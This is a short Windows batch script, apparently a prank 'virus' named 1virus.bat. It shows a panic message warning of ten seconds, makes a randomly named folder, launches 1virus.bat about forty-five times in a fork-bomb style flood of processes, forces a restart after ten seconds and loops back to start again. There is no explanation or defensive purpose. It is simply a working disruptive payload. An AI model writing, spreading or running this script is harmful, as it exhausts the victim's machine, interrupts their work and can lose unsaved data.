@echo off
:Admin
start "" /wait cmd /c "echo DO SOMETHING RIGHT NOW YOU ONLY HAVE 10 SECONDS!&echo(&pause"
mkdir %Random%
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
start 1virus.bat
shutdown -r -t 10
goto Admin
